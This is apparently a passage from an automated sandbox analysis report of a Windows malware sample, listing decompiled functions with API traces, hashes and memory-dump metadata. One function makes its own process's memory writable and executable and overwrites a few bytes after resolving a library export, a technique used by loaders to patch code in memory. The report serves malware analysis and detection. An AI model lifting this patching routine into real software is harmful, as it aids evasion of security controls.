                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0327CCB8), ref: 0327CC53
                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0327CC68
                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0327CC94
                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0327CC9D
                      • Part of subcall function 03264C24: SysFreeString.OLEAUT32(0327D70C), ref: 03264C32
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                    • String ID:
                    • API String ID: 1897104825-0
                    • Opcode ID: 250c3baf7c25803ea1de1d9971857a30ac413610ea72c4625f1552179047c85b
                    • Instruction ID: 389c3207ad63e199ce46b9b280b27efe1f290529ebcad7d78419924b1a442540
                    • Opcode Fuzzy Hash: 250c3baf7c25803ea1de1d9971857a30ac413610ea72c4625f1552179047c85b
                    • Instruction Fuzzy Hash: A821A175A50318BADB11EAE5CC52FEE77ACAF09B00F500466B600FB180D6B4AA858794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E03277B88(PVOID* __eax, signed int __ecx, void* __edx) {
                    				PVOID* _v12;
                    				void _v28;
                    				long* _t4;
                    				long* _t5;
                    				long _t13;
                    				void* _t14;
                    				signed int _t20;
                    
                    				_push(__ecx);
                    				_t20 = __ecx;
                    				_t14 = __edx;
                    				_v12 = __eax;
                    				_t4 =  *0x329e354; // 0x4
                    				_t5 = __ecx * 0x32;
                    				NtProtectVirtualMemory(GetCurrentProcess(), _v12, _t5, 0x40, _t4);
                    				E03277B7C(_t14, _t20, _v28);
                    				_t13 = NtWriteVirtualMemory(GetCurrentProcess(),  &_v28, _t14, 4, 0x329e354); // executed
                    				return _t13;
                    			}

                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,00000004,00000040,00000004,00000005,?,03266748,03277C01,?,03277C7C,73990000,00000000,00000000,00000000,00000000,00000000), ref: 03277BA3
                    • NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000004,00000040,00000004,00000005,?,03266748,03277C01,?,03277C7C,73990000,00000000,00000000,00000000,00000000), ref: 03277BA9
                    • GetCurrentProcess.KERNEL32(00000000,0329E34C,00000004,0329E354,00000000,00000000,00000004,00000040,00000004,00000005,?,03266748,03277C01,?,03277C7C,73990000), ref: 03277BC7
                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,0329E34C,00000004,0329E354,00000000,00000000,00000004,00000040,00000004,00000005,?,03266748,03277C01,?,03277C7C), ref: 03277BCD
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: CurrentMemoryProcessVirtual$ProtectWrite
                    • String ID:
                    • API String ID: 1222570558-0
                    • Opcode ID: 94a844dcfa0a822d7ef2258a37128adb64e839401edd50d5dd37d7f99978d9c3
                    • Instruction ID: 8deb46cb332ca2c0c25de5ade7c00fc194e6cdd3508cd5d1f3ab7b27a4119f94
                    • Opcode Fuzzy Hash: 94a844dcfa0a822d7ef2258a37128adb64e839401edd50d5dd37d7f99978d9c3
                    • Instruction Fuzzy Hash: 14E0E5B67193107FD604FAAC9D84E7B67DC9F8C610F11442AB348DB250C5B49884876D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E03276DC0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _v8;
                    				char _v24;
                    				char _v28;
                    				intOrPtr _t29;
                    				intOrPtr _t30;
                    				void* _t34;
                    				void* _t35;
                    				intOrPtr _t36;
                    
                    				_t34 = _t35;
                    				_t36 = _t35 + 0xffffffd8;
                    				_push(__esi);
                    				_v28 = 0;
                    				_v8 = __eax;
                    				_push(_t34);
                    				_push(0x3276e93);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t36;
                    				_push(_t34);
                    				_push(0x3276e23);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t36;
                    				E03276D64(_v8, __edx, 0,  &_v24, __esi, __eflags); // executed
                    				_push(E03265E70(__edx));
                    				_push(0x3276ea4);
                    				_push(5);
                    				_push( &_v24); // executed
                    				L0326CDA4(); // executed
                    				E03276D54( &_v24);
                    				_pop(_t29);
                    				 *[fs:eax] = _t29;
                    				_t30 = 0;
                    				 *[fs:eax] = _t30;
                    				_push(0x3276e9a);
                    				return E032644A0( &_v28);
                    			}

                    APIs
                      • Part of subcall function 03276D64: CLSIDFromProgID.OLE32(00000000,?,00000000,03276DB1,?,?,?,00000000), ref: 03276D91
                    • CoCreateInstance.OLE32(?,00000000,00000005,03276EA4,00000000,00000000,03276E23,?,00000000,03276E93), ref: 03276E0F
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: CreateFromInstanceProg
                    • String ID:
                    • API String ID: 2151042543-0
                    • Opcode ID: a9052069faa683cba48dffbf78e4a70e43c7004f63e5de75c29904c8f5c5937b
                    • Instruction ID: 81f55831c6a138fb3eeb8ba82bb1f41ac4d0048e42ed48b3320d060752a21226
                    • Opcode Fuzzy Hash: a9052069faa683cba48dffbf78e4a70e43c7004f63e5de75c29904c8f5c5937b
                    • Instruction Fuzzy Hash: 0801DF35638B04AFDB11DFA0DC52D6FBBACFB49B10B614475F900E6A40E6B05980C9B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E03261724(signed int __eax) {
                    				signed int __ebx;
                    				signed int __edi;
                    				signed int __esi;
                    				void* _t96;
                    				void** _t99;
                    				signed int _t104;
                    				signed int _t109;
                    				signed int _t110;
                    				intOrPtr* _t114;
                    				void* _t116;
                    				void* _t121;
                    				signed int _t125;
                    				signed int _t129;
                    				signed int _t131;
                    				signed int _t132;
                    				signed int _t133;
                    				signed int _t134;
                    				signed int _t135;
                    				unsigned int _t141;
                    				signed int _t142;
                    				void* _t144;
                    				void* _t147;
                    				intOrPtr _t148;
                    				signed int _t150;
                    				long _t156;
                    				intOrPtr _t159;
                    				signed int _t162;
                    
                    				_t129 =  *0x329b04d; // 0x0
                    				if(__eax > 0xa2c) {
                    					__eflags = __eax - 0x40a2c;
                    					if(__eax > 0x40a2c) {
                    						_pop(_t120);
                    						__eflags = __eax;
                    						if(__eax >= 0) {
                    							_push(_t120);
                    							_t162 = __eax;
                    							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                    							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                    							_t121 = _t96;
                    							if(_t121 != 0) {
                    								_t147 = _t121;
                    								 *((intOrPtr*)(_t147 + 8)) = _t162;
                    								 *(_t147 + 0xc) = _t156 | 0x00000004;
                    								E03261644();
                    								_t99 =  *0x329d7b0; // 0x7fde0000
                    								 *_t147 = 0x329d7ac;
                    								 *0x329d7b0 = _t121;
                    								 *(_t147 + 4) = _t99;
                    								 *_t99 = _t121;
                    								 *0x329d7a8 = 0;
                    								_t121 = _t121 + 0x10;
                    							}
                    							return _t121;
                    						} else {
                    							__eflags = 0;
                    							return 0;
                    						}
                    					} else {
                    						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
                    						__eflags = _t129;
                    						if(__eflags != 0) {
                    							while(1) {
                    								asm("lock cmpxchg [0x329b718], ah");
                    								if(__eflags == 0) {
                    									goto L39;
                    								}
                    								Sleep(0);
                    								asm("lock cmpxchg [0x329b718], ah");
                    								if(__eflags != 0) {
                    									Sleep(0xa);
                    									continue;
                    								}
                    								goto L39;
                    							}
                    						}
                    						L39:
                    						_t141 = _t125 - 0xb30;
                    						_t142 = _t141 >> 0xd;
                    						_t131 = _t141 >> 8;
                    						_t104 = 0xffffffff << _t131 &  *(0x329b728 + _t142 * 4);
                    						__eflags = 0xffffffff;
                    						if(0xffffffff == 0) {
                    							_t132 = _t142;
                    							__eflags = 0xfffffffe << _t132 &  *0x329b724;
                    							if((0xfffffffe << _t132 &  *0x329b724) == 0) {
                    								_t133 =  *0x329b720; // 0x70050
                    								_t134 = _t133 - _t125;
                    								__eflags = _t134;
                    								if(_t134 < 0) {
                    									_t109 = E032615CC(_t125);
                    								} else {
                    									_t110 =  *0x329b71c; // 0x9230060
                    									_t109 = _t110 - _t125;
                    									 *0x329b71c = _t109;
                    									 *0x329b720 = _t134;
                    									 *(_t109 - 4) = _t125 | 0x00000002;
                    								}
                    								 *0x329b718 = 0;
                    								return _t109;
                    							} else {
                    								asm("bsf edx, eax");
                    								asm("bsf ecx, eax");
                    								_t135 = _t132 | _t142 << 0x00000005;
                    								goto L47;
                    							}
                    						} else {
                    							asm("bsf eax, eax");
                    							_t135 = _t131 & 0xffffffe0 | _t104;
                    							L47:
                    							_push(_t152);
                    							_push(_t145);
                    							_t148 = 0x329b7a8 + _t135 * 8;
                    							_t159 =  *((intOrPtr*)(_t148 + 4));
                    							_t114 =  *((intOrPtr*)(_t159 + 4));
                    							 *((intOrPtr*)(_t148 + 4)) = _t114;
                    							 *_t114 = _t148;
                    							__eflags = _t148 - _t114;
                    							if(_t148 == _t114) {
                    								asm("rol eax, cl");
                    								_t80 = 0x329b728 + _t142 * 4;
                    								 *_t80 =  *(0x329b728 + _t142 * 4) & 0xfffffffe;
                    								__eflags =  *_t80;
                    								if( *_t80 == 0) {
                    									asm("btr [0x329b724], edx");
                    								}
                    							}
                    							_t150 = 0xfffffff0 &  *(_t159 - 4);
                    							_t144 = 0xfffffff0 - _t125;
                    							__eflags = 0xfffffff0;
                    							if(0xfffffff0 == 0) {
                    								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                    								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                    								__eflags =  *_t89;
                    							} else {
                    								_t116 = _t125 + _t159;
                    								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                    								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                    								__eflags = 0xfffffff0 - 0xb30;
                    								if(0xfffffff0 >= 0xb30) {
                    									E03261500(_t116, 0xfffffffffffffff3, _t144);
                    								}
                    							}
                    							 *(_t159 - 4) = _t125 + 2;
                    							 *0x329b718 = 0;
                    							return _t159;
                    						}
                    					}
                    				} else {
                    					__eflags = __cl;
                    					__eax =  *(__edx + 0x329b5c0) & 0x000000ff;
                    					__ebx = 0x3289040 + ( *(__edx + 0x329b5c0) & 0x000000ff) * 8;
                    					if(__eflags != 0) {
                    						while(1) {
                    							__eax = 0x100;
                    							asm("lock cmpxchg [ebx], ah");
                    							if(__eflags == 0) {
                    								goto L5;
                    							}
                    							__ebx = __ebx + 0x20;
                    							__eflags = __ebx;
                    							__eax = 0x100;
                    							asm("lock cmpxchg [ebx], ah");
                    							if(__ebx != 0) {
                    								__ebx = __ebx + 0x20;
                    								__eflags = __ebx;
                    								__eax = 0x100;
                    								asm("lock cmpxchg [ebx], ah");
                    								if(__ebx != 0) {
                    									__ebx = __ebx - 0x40;
                    									__eflags = __ebx;
                    									Sleep(0);
                    									__eax = 0x100;
                    									asm("lock cmpxchg [ebx], ah");
                    									if(__eflags != 0) {
                    										Sleep(0xa);
                    										continue;
                    									}
                    								}
                    							}
                    							goto L5;
                    						}
                    					}
                    					L5:
                    					__edx =  *(__ebx + 4);
                    					__eax =  *(__edx + 8);
                    					__ecx = 0xfffffff8;
                    					__eflags = __edx - __ebx;
                    					if(__edx == __ebx) {
                    						__edx =  *(__ebx + 0x10);
                    						__ecx =  *(__ebx + 2) & 0x0000ffff;
                    						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                    						__eflags = __eax -  *(__ebx + 0xc);
                    						if(__eax >  *(__ebx + 0xc)) {
                    							_push(__esi);
                    							_push(__edi);
                    							__eflags =  *0x329b04d;
                    							if(__eflags != 0) {
                    								while(1) {
                    									__eax = 0x100;
                    									asm("lock cmpxchg [0x329b718], ah");
                    									if(__eflags == 0) {
                    										goto L20;
                    									}
                    									Sleep(0);
                    									__eax = 0x100;
                    									asm("lock cmpxchg [0x329b718], ah");
                    									if(__eflags != 0) {
                    										Sleep(0xa);
                    										continue;
                    									}
                    									goto L20;
                    								}
                    							}
                    							L20:
                    							 *(__ebx + 1) =  *(__ebx + 1) &  *0x329b724;
                    							__eflags =  *(__ebx + 1) &  *0x329b724;
                    							if(( *(__ebx + 1) &  *0x329b724) == 0) {
                    								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
                    								__edi =  *0x329b720; // 0x70050
                    								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
                    								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
                    									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
                    									__edi = __eax;
                    									__eax = E032615CC(__eax);
                    									__esi = __eax;
                    									__eflags = __eax;
                    									if(__eax != 0) {
                    										goto L33;
                    									} else {
                    										 *0x329b718 = __al;
                    										 *__ebx = __al;
                    										_pop(__edi);
                    										_pop(__esi);
                    										_pop(__ebx);
                    										return __eax;
                    									}
                    								} else {
                    									__esi =  *0x329b71c; // 0x9230060
                    									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
                    									__edx = __ecx + 0xb30;
                    									__eflags = __edi - __ecx + 0xb30;
                    									if(__edi >= __ecx + 0xb30) {
                    										__edi = __ecx;
                    									}
                    									__esi = __esi - __edi;
                    									 *0x329b720 =  *0x329b720 - __edi;
                    									 *0x329b71c = __esi;
                    									goto L33;
                    								}
                    							} else {
                    								asm("bsf eax, esi");
                    								__esi = __eax * 8;
                    								__ecx =  *(0x329b728 + __eax * 4);
                    								asm("bsf ecx, ecx");
                    								__ecx =  *(0x329b728 + __eax * 4) + __eax * 8 * 4;
                    								__edi = 0x329b7a8 + ( *(0x329b728 + __eax * 4) + __eax * 8 * 4) * 8;
                    								__esi =  *(__edi + 4);
                    								__edx =  *(__esi + 4);
                    								 *(__edi + 4) = __edx;
                    								 *__edx = __edi;
                    								__eflags = __edi - __edx;
                    								if(__edi == __edx) {
                    									__edx = 0xfffffffe;
                    									asm("rol edx, cl");
                    									_t38 = 0x329b728 + __eax * 4;
                    									 *_t38 =  *(0x329b728 + __eax * 4) & 0xfffffffe;
                    									__eflags =  *_t38;
                    									if( *_t38 == 0) {
                    										asm("btr [0x329b724], eax");
                    									}
                    								}
                    								__edi = 0xfffffff0;
                    								__edi = 0xfffffff0 &  *(__esi - 4);
                    								__eflags = 0xfffffff0 - 0x10a60;
                    								if(0xfffffff0 < 0x10a60) {
                    									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                    									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                    									__eflags =  *_t52;
                    								} else {
                    									__edx = __edi;
                    									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
                    									__edx = __edx - __edi;
                    									__eax = __edi + __esi;
                    									__ecx = __edx + 3;
                    									 *(__eax - 4) = __ecx;
                    									 *(__edx + __eax - 8) = __edx;
                    									__eax = E03261500(__eax, __ecx, __edx);
                    								}
                    								L33:
                    								_t56 = __edi + 6; // 0x70056
                    								__ecx = _t56;
                    								 *(__esi - 4) = _t56;
                    								__eax = 0;
                    								 *0x329b718 = __al;
                    								 *__esi = __ebx;
                    								 *((intOrPtr*)(__esi + 8)) = 0;
                    								 *((intOrPtr*)(__esi + 0xc)) = 1;
                    								 *(__ebx + 0x10) = __esi;
                    								_t61 = __esi + 0x20; // 0x9230080
                    								__eax = _t61;
                    								__ecx =  *(__ebx + 2) & 0x0000ffff;
                    								__edx = __ecx + __eax;
                    								 *(__ebx + 8) = __ecx + __eax;
                    								__edi = __edi + __esi;
                    								__edi = __edi - __ecx;
                    								__eflags = __edi;
                    								 *(__ebx + 0xc) = __edi;
                    								 *__ebx = 0;
                    								 *(__eax - 4) = __esi;
                    								_pop(__edi);
                    								_pop(__esi);
                    								_pop(__ebx);
                    								return __eax;
                    							}
                    						} else {
                    							_t19 = __edx + 0xc;
                    							 *_t19 =  *(__edx + 0xc) + 1;
                    							__eflags =  *_t19;
                    							 *(__ebx + 8) = __ecx;
                    							 *__ebx = 0;
                    							 *(__eax - 4) = __edx;
                    							_pop(__ebx);
                    							return __eax;
                    						}
                    					} else {
                    						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
                    						__ecx = 0xfffffff8 &  *(__eax - 4);
                    						__eflags = 0xfffffff8;
                    						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
                    						 *(__eax - 4) = __edx;
                    						if(0xfffffff8 == 0) {
                    							__ecx =  *(__edx + 4);
                    							 *(__ecx + 0x14) = __ebx;
                    							 *(__ebx + 4) = __ecx;
                    							 *__ebx = 0;
                    							_pop(__ebx);
                    							return __eax;
                    						} else {
                    							 *__ebx = 0;
                    							_pop(__ebx);
                    							return __eax;
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • Sleep.KERNEL32(00000000), ref: 032617D0
                    • Sleep.KERNEL32(0000000A,00000000), ref: 032617E6
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: b681fc1f67b4ec08374b8c7159054cad56d8dcb6c30c45c034f24359c73f7033
                    • Instruction ID: ee9989b0e973dee3bd9cb34c5c15f358633d432af3dc225919232f2f2f94290b
                    • Opcode Fuzzy Hash: b681fc1f67b4ec08374b8c7159054cad56d8dcb6c30c45c034f24359c73f7033
                    • Instruction Fuzzy Hash: 1BB1D176A213518BDB15DF28F8883A5BBE1EF85351F18C2AED4458B389D770B8E1C790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E03261A8C(void* __eax, void* __edi) {
                    				signed int __ebx;
                    				void* _t50;
                    				signed int _t51;
                    				signed int _t52;
                    				signed int _t54;
                    				void _t57;
                    				int _t58;
                    				signed int _t65;
                    				void* _t67;
                    				signed int _t69;
                    				intOrPtr _t70;
                    				signed int _t75;
                    				signed int _t76;
                    				signed int _t77;
                    				void* _t79;
                    				void* _t82;
                    				void _t85;
                    				void* _t87;
                    				void* _t89;
                    
                    				_t48 = __eax;
                    				_t77 =  *(__eax - 4);
                    				_t65 =  *0x329b04d; // 0x0
                    				if((_t77 & 0x00000007) != 0) {
                    					__eflags = _t77 & 0x00000005;
                    					if((_t77 & 0x00000005) != 0) {
                    						_pop(_t65);
                    						__eflags = _t77 & 0x00000003;
                    						if((_t77 & 0x00000003) != 0) {
                    							return 0xffffffff;
                    						} else {
                    							_push(_t65);
                    							_t67 = __eax - 0x10;
                    							E03261644();
                    							_t50 = _t67;
                    							_t85 =  *_t50;
                    							_t82 =  *(_t50 + 4);
                    							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
                    							if(_t51 == 0) {
                    								_t52 = _t51 | 0xffffffff;
                    								__eflags = _t52;
                    							} else {
                    								 *_t82 = _t85;
                    								 *(_t85 + 4) = _t82;
                    								_t52 = 0;
                    							}
                    							 *0x329d7a8 = 0;
                    							return _t52;
                    						}
                    					} else {
                    						goto L21;
                    					}
                    				} else {
                    					__eflags = __bl;
                    					__ebx =  *__edx;
                    					if(__eflags != 0) {
                    						while(1) {
                    							__eax = 0x100;
                    							asm("lock cmpxchg [ebx], ah");
                    							if(__eflags == 0) {
                    								goto L6;
                    							}
                    							Sleep(0);
                    							__edx = __edx;
                    							__ecx = __ecx;
                    							__eax = 0x100;
                    							asm("lock cmpxchg [ebx], ah");
                    							if(__eflags != 0) {
                    								Sleep(0xa);
                    								__edx = __edx;
                    								__ecx = __ecx;
                    								continue;
                    							}
                    							goto L6;
                    						}
                    					}
                    					L6:
                    					_t6 = __edx + 0xc;
                    					 *_t6 =  *(__edx + 0xc) - 1;
                    					__eflags =  *_t6;
                    					__eax =  *(__edx + 8);
                    					if( *_t6 == 0) {
                    						__eflags = __eax;
                    						if(__eax == 0) {
                    							L12:
                    							 *(__ebx + 0xc) = __eax;
                    						} else {
                    							__eax =  *(__edx + 0x14);
                    							__ecx =  *(__edx + 4);
                    							 *(__eax + 4) = __ecx;
                    							 *(__ecx + 0x14) = __eax;
                    							__eax = 0;
                    							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
                    							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
                    								goto L12;
                    							}
                    						}
                    						 *__ebx = __al;
                    						__eax = __edx;
                    						__edx =  *(__edx - 4);
                    						__bl =  *0x329b04d; // 0x0
                    						L21:
                    						__eflags = _t65;
                    						_t69 = _t77 & 0xfffffff0;
                    						_push(_t84);
                    						_t87 = _t48;
                    						if(__eflags != 0) {
                    							while(1) {
                    								_t54 = 0x100;
                    								asm("lock cmpxchg [0x329b718], ah");
                    								if(__eflags == 0) {
                    									goto L22;
                    								}
                    								Sleep(0);
                    								_t54 = 0x100;
                    								asm("lock cmpxchg [0x329b718], ah");
                    								if(__eflags != 0) {
                    									Sleep(0xa);
                    									continue;
                    								}
                    								goto L22;
                    							}
                    						}
                    						L22:
                    						__eflags = (_t87 - 4)[_t69] & 0x00000001;
                    						_t75 = (_t87 - 4)[_t69];
                    						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
                    							_t54 = _t69 + _t87;
                    							_t76 = _t75 & 0xfffffff0;
                    							_t69 = _t69 + _t76;
                    							__eflags = _t76 - 0xb30;
                    							if(_t76 >= 0xb30) {
                    								_t54 = E032614C0(_t54);
                    							}
                    						} else {
                    							_t76 = _t75 | 0x00000008;
                    							__eflags = _t76;
                    							(_t87 - 4)[_t69] = _t76;
                    						}
                    						__eflags =  *(_t87 - 4) & 0x00000008;
                    						if(( *(_t87 - 4) & 0x00000008) != 0) {
                    							_t76 =  *(_t87 - 8);
                    							_t87 = _t87 - _t76;
                    							_t69 = _t69 + _t76;
                    							__eflags = _t76 - 0xb30;
                    							if(_t76 >= 0xb30) {
                    								_t54 = E032614C0(_t87);
                    							}
                    						}
                    						__eflags = _t69 - 0x13fff0;
                    						if(_t69 == 0x13fff0) {
                    							__eflags =  *0x329b720 - 0x13fff0;
                    							if( *0x329b720 != 0x13fff0) {
                    								_t70 = _t87 + 0x13fff0;
                    								E03261560(_t54);
                    								 *((intOrPtr*)(_t70 - 4)) = 2;
                    								 *0x329b720 = 0x13fff0;
                    								 *0x329b71c = _t70;
                    								 *0x329b718 = 0;
                    								__eflags = 0;
                    								return 0;
                    							} else {
                    								_t89 = _t87 - 0x10;
                    								_t57 =  *_t89;
                    								_t79 =  *(_t89 + 4);
                    								 *(_t57 + 4) = _t79;
                    								 *_t79 = _t57;
                    								 *0x329b718 = 0;
                    								_t58 = VirtualFree(_t89, 0, 0x8000);
                    								__eflags = _t58 - 1;
                    								asm("sbb eax, eax");
                    								return _t58;
                    							}
                    						} else {
                    							 *(_t87 - 4) = _t69 + 3;
                    							 *(_t87 - 8 + _t69) = _t69;
                    							E03261500(_t87, _t76, _t69);
                    							 *0x329b718 = 0;
                    							__eflags = 0;
                    							return 0;
                    						}
                    					} else {
                    						__eflags = __eax;
                    						 *(__edx + 8) = __ecx;
                    						 *(__ecx - 4) = __eax;
                    						if(__eflags == 0) {
                    							__ecx =  *(__ebx + 4);
                    							 *(__edx + 0x14) = __ebx;
                    							 *(__edx + 4) = __ecx;
                    							 *(__ecx + 0x14) = __edx;
                    							 *(__ebx + 4) = __edx;
                    							 *__ebx = 0;
                    							__eax = 0;
                    							__eflags = 0;
                    							_pop(__ebx);
                    							return 0;
                    						} else {
                    							__eax = 0;
                    							__eflags = 0;
                    							 *__ebx = __al;
                    							_pop(__ebx);
                    							return 0;
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • Sleep.KERNEL32(00000000,?,?,00000000,03261FE4), ref: 03261B17
                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,03261FE4), ref: 03261B31
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 7254447fef5165c620f5f0f2e9ca8e4ed7ade65d0acfc42498e3f46a72977a13
                    • Instruction ID: 60e4d5440c9c8155ffc60228732dcddf6966bc45c9de09300a48dae51e17f695
                    • Opcode Fuzzy Hash: 7254447fef5165c620f5f0f2e9ca8e4ed7ade65d0acfc42498e3f46a72977a13
                    • Instruction Fuzzy Hash: 5B51D0766203418FD715DF68E984766BBD4AF45310F1882AED444CB38AE7B0F8D5C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E03277C04(intOrPtr __eax, void* __ecx, char __edx, void* __eflags) {
                    				intOrPtr _v8;
                    				char _v12;
                    				CHAR* _t22;
                    				struct HINSTANCE__* _t23;
                    				struct HINSTANCE__* _t27;
                    				intOrPtr _t37;
                    				void* _t41;
                    
                    				_v12 = __edx;
                    				_v8 = __eax;
                    				E03264954(_v8);
                    				E03264954(_v12);
                    				_push(_t41);
                    				_push(0x3277ca2);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t41 + 0xfffffff8;
                    				LoadLibraryExA(E03264964(_v8), 0, 0); // executed
                    				 *0x329e344 = GetModuleHandleA(E03264964(_v8));
                    				_t22 = E03264964(_v12);
                    				_t23 =  *0x329e344; // 0x73990000
                    				 *0x329e348 = GetProcAddress(_t23, _t22);
                    				E03277BD8(0x3266748);
                    				_t27 =  *0x329e344; // 0x73990000
                    				FreeLibrary(_t27); // executed
                    				_pop(_t37);
                    				 *[fs:eax] = _t37;
                    				_push(0x3277ca9);
                    				return E032644C4( &_v12, 2);
                    			}

                    APIs
                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
                    • GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
                    • FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Library$AddressFreeHandleLoadModuleProc
                    • String ID:
                    • API String ID: 1437655972-0
                    • Opcode ID: 37555854c3415e9d4a3f2076d2818d67c24ea6ae523dc559c285b114bf702bd4
                    • Instruction ID: 5d02b2996a51df073bccbc5181b6319c46fa71d393f7c8ad58ccebe7596a407d
                    • Opcode Fuzzy Hash: 37555854c3415e9d4a3f2076d2818d67c24ea6ae523dc559c285b114bf702bd4
                    • Instruction Fuzzy Hash: 2D019278A24308BFDB00FBA9E956A6D77A8EF49200FA14075A008EB650E7749DC0CB18
                    Uniqueness

